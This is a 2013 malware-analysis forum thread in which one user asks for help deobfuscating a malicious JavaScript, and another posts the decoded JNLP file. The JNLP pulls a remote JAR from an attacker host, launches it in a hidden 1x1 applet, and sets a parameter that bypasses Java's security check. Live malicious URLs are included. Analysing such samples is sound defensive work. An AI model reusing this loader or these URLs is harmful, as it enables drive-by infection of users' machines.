A forum for reverse engineering, OS internals and malware analysis 

Discussion on reverse-engineering and debugging.
 #21271  by skeptre
 Tue Oct 29, 2013 6:17 pm
Hi,

I obtained a javascript from the following link:
hxxp://mp3rs.com/mp3rs.com/admin/skin_cp/images/72f11cda78/?=MDct5ibpFWbf12c8ZTN1ADN3YTM0ETO0EDN89CO3EGZjFTMmJzNvMXZnFWbp9Ccj9lbpt2cv4WatRWYv02bj5ycyNDct9SbvNmLzJ3Mw12LvoDc0RHa8NnZ

I appreciate any hints about trying to understand how to de-obfuscate it, attaching the same.
I tried debugging with firefox firebug and a JS interpreter but could not complete the whole de-obfuscation.
Attachments
password - infected
(2.39 KiB) Downloaded 36 times
 #21433  by Xylitol
 Fri Nov 22, 2013 11:33 am
Code: Select all
<?xml version='1.0' encoding='utf-8'?>
<jnlp spec='1.0' xmlns:jfx='http://javafx.com' href='app.jnlp'>
<information>
<title>Applet Test JNLP</title>
<vendor>atom</vendor>
<description>atom</description>
<offline-allowed/>
</information>

<resources>
<j2se version='1.7+' href='http://java.sun.com/products/autodl/j2se' />
<jar href='http://mp3rs.com/mp3rs.com/admin/skin_cp/images/72f11cda78/?f=a&k=4149141674055630' main='true' />
</resources>
<applet-desc name='atom' main-class='Auto' width='1' height='1'>
<param name='__applet_ssv_validated' value='true'></param>
<param name='url' value='http://mp3rs.com/mp3rs.com/admin/skin_cp/images/72f11cda78/?f=sm_main.mp3&k=4149141674055641'></param>
</applet-desc>
<update check='background'/>
</jnlp>
http://urlquery.net/report.php?id=7868909
http://urlquery.net/report.php?id=7868910
http://urlquery.net/report.php?id=7868912